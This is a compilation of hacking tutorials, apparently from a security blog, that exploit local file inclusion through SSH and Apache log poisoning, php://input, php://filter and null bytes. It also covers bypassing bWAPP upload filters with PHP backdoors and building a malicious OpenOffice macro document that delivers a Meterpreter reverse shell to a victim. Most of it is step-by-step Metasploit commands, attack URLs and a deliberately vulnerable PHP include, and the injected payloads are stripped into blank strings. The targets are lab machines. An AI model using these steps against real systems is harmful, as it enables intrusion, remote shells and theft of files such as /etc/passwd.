Web Server Exploitation with SSH Log Poisoning through Lfi

In this article you will learn how make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack first you need to read my previous article which will help you to create local file inclusion vulnerability manually.

Attacker: Kali Linux

Target: Metasploitable 2

Open terminal in your kali Linux and connect the target using SSH service

ssh msfadmin@192.168.1.105

From screenshot you can see I am connected with target PC, now type following command to check the permission for auth.log file

Ls –l /var/log/auth.log

Now if you notice the given screenshot again you will find that the highlighted text is showing read write permission had been given to auth.log file.

Since we know that the auth.log file has read permission therefore type following command to view its logs.

Tail –f /var/log/auth.log

The highlighted text is showing the log for the valid user msfadmin.

Now open another terminal in kali where I will try to connect with web server using fake user name and then confirm whether any log is generated inside auth.log file for invalid user or not.

Ssh hacker@192.168.1.105

When you move back to your previous terminal you find it has created a log for invalid user hacker which you can also check in the given screenshot.

Hence it is confirm that auth.log file generates log for every failed and pass login when we try to connect with web server. Taking advantage of this feature now I will send PHP code as fake user and it will get added automatically in auth.log file as new log.

Ssh ‘’@192.168.1.105

Again when you check its log, you will find the PHP code has been added as new log.

Since I have already created LFI vulnerability manually inside the web server, so if you want to create LFI vulnerability view above link of previous article.

In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

Now include the auth.log file as file parameter and give following URL inside browser.

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

From screenshot you can read the warning cannot execute blank command, it means our PHP code which was containing CMD comment is successfully injected now only we need to send any command as parameter

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps

Here it will dump the data of auth log as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same way execute pwd through cmd and view the result from inside the given screenshot.

Exploiting Remote PC with Apache OpenOffice Text Document Malicious Macro Execution

This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

Exploit Targets

Apach Open Office on Windows

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open the terminal in kali Linux and type msfconsole to load metasploit framework.

Now type use exploit/multi/misc/openoffice_document_macro

msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp

msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (openoffice_document_macro)>set srvhost 192.168.01.04

msf exploit (openoffice_document_macro)>set lport 4444

msf exploit (openoffice_document_macro)>exploit

 From the screenshot you can see the highlighted text is showing the path of malicious odt file.

The malicious odt File had been generated successfully which is stored on your local computer inside following path:

/root/.msf4/local/msf.odt

Now send your msf.odt files to victim, as soon as he download and open it, you can access meterpreter shell on victim computer.

File Upload Exploitation in bWAPP (Bypass All Security)

In this article you will learn how to bypass all three security level of unrestricted file upload inside the bWAPP and if you want to know more about the various kind of file uploading vulnerability read previous article that may help you to understand this article more clearly.

LOW SECURITY

Open the target IP in browser: 192.168.0.106/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select Unrestricted File Upload now and click on hack.

Create PHP backdoor using msfvenom and start multi handler in the background; now from screenshot you can see I have browse meter.php for uploading as an image inside the web server.

When the image gets successfully uploaded on the web server it will send the link of directory where image is saved to view the uploaded image. Since we haven’t upload any real image therefore we will try to execute our PHP backdoor by making click on the link “here”.

When victim click the above link “here” we will get victim’s reverse connection through meterpreter session inside the metasploit framework.

From screenshot you can see metasploit session 1 is opened.

MEDIUM SECURITY

As the level of security is change so here we cannot able to perform same procedure as above. Although here you just need to change only the extension of your PHP backdoor to bypass medium security. If you notice the image given below here you will find that I have browse meter.php3 for uploading

Now repeat the same step run multi handler at background and make click on the given link “here” to receive metrpreter session.

GREAT!!! From screenshot you can see metasploit session 2 is opened

HIGH SECURITY

Now we have enter into high security where above two file uploading attack will get failed so here again you need to make some small changes  into the extension of PHP backdoor file for uploading it in the web server.

From screenshot you can read the file name high.php.png which I have browse for uploading.

Here our file is successfully uploaded now make right click on the link “here” to copy link location and keep multi handler running at the background.

To bypass high security of file uploading in bWAPP we need to switch the bug as well as security level.

Set security level low and choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL.

 Since I have uploaded the PHP backdoor shell in high security but execute that backdoor through low security with help of LFI vulnerability. Now just manipulate the following URL as shown in screenshot.

http://192.168.0.106/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png

When above URL is executed in the browser you will get victim’s reverse connection inside metasploit.

Congrats!!! From screenshot you can see metasploit session 3 is opened.

Hence we have bypassed all three security level inside bWAPP

5 ways to Exploit LFi Vulnerability

The main aim of writing this article is to share the idea of making an attack on a web server using various techniques when the server is suffering from file inclusion vulnerability. As we all are aware of LFI vulnerability which allows the user to include a file through URL in the browser. In this article I have used two different platform bWAPP and DVWA which contains file inclusion vulnerability and through which I have performed LFI attack in FOUR different ways.

Basic local file inclusion

Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL. To perform basic attacks manipulate

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd

In basic LFI attack we can directly read the content of a file from its directories using (../) or simply (/), now if you will notice the given below screenshot you will find that I have access the password file when the above URL is executed in the browser.

Null byte

In some scenario the above basic local file inclusion attack may not work due to high security level. From below image you can observe now that I got fail to read the password file when executing the same path in URL. So when we face such kind of problem then go for NULL BYTE attack.

Now turn on burp suite to capture the browser request then select proxy tab and start intercept. Do not forget to set browser proxy while making use of burp suite

Now inside burp suite send the intercepted data into repeater.

Inside repeater you can do analysis of sent request and response generated by it. From screenshot it will be clear that /etc/passwd is not working and I am not able to read the password file.  

From following screenshot you can see I had forward the request by adding null character () at the end of directory /etc/passwd and click on go tab. Then on the right sight of window the password file get open as response.

Base64 encoded

Now there is another way to exploit LFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.

http://192.168.1.101/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource=/etc/passwd

Here from the screenshot you can see the content of password file is encoded into base64; copy the whole encoded text.

I am using hackbar which a Firefox plugin to decode above copied text.

Now a pop-up box will get open past the copied encoded text inside it and click on ok

From the given screenshot you can view the result and read the content of password file.

PHP Input

Using PHP input function we will execute injected PHP code to exploit LFI vulnerability. With the help of hackbar I am going to perform this task in which first we need to load the URL of the targeted web page as you can see in the given screenshot.

Now manipulate above URL using PHP input function

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

Then select the check box to enable Post data which will forward the post request and add cmd comment in given text areaas shown in following screenshot, finally click on execute.

This will show directories of victim PC.

Now time to connect the victim through reverse connection; open terminal in kali Linux and type msfconsole to start metasploit framework.

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.0.104 

msf exploit (web_delivery)>set srvport  8081

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste above copied PHP code inside the URL as shown in the image and execute it

When above URL get execute the attacker got victim’s meterpreter session inside the metasploit.

msf exploit (web_delivery)>session –I 1

meterpreter> sysinfo

Proc/self/environ

If the server is outdated then to exploit it through LFI we can include proc/self/environ file that stores User_Agent where we will place our PHP code for executing CMD command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ

Now start burp suite and capture the browser request and send the fetch data into repeater.

Add cmd comment  inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id as shown in the below image. On the right side of window you can see the highlight result as response.

Exploit Webserver through Log Injection with LFI

Through this article you will see how to create local file inclusion log posioning inside the target machine and gain unauthourized access with help of apache access .log file.

Attacker: Kali Linux

Target: Metasploitable 2

Connect the target using SSH  service as shown below in the following image

ssh msfadmin@192.168.1.8

Now login with user as “sudo” and create a folder “lfi” inside /var/www

cd /var/www

mkdir lfi

Now create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.

   $file = $_GET['file'];

   if(isset($file))

   {

       include("$file");

   }

   else

   {

       include("index.php");

   }

   ?>

Now I have saved above PHP code inside a text file as lfi.php and share this file.

In order to download lfi.PHP inside the lfi directory type following command

Wget http://192.168.1.25/lfi.php

Now let’s browse following URL: 192.168.1.8/lfi/lfi.php

In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

Now I will try to open apache access.log file and to explore this file first I will give read permission to apache2 and then include the acess.log file.

Now include the acess.log file as file parameter and give following URL inside browser.

192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log

Now turn on burp suite to capture the request of same web page

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.

Add cmd comment inside user_Agent and send the request with GET parameter  192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&c=ps as shown in the below image. Then click on forward.

Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same manner execute lsb_release –a through cmd and view the result from inside the given screenshot.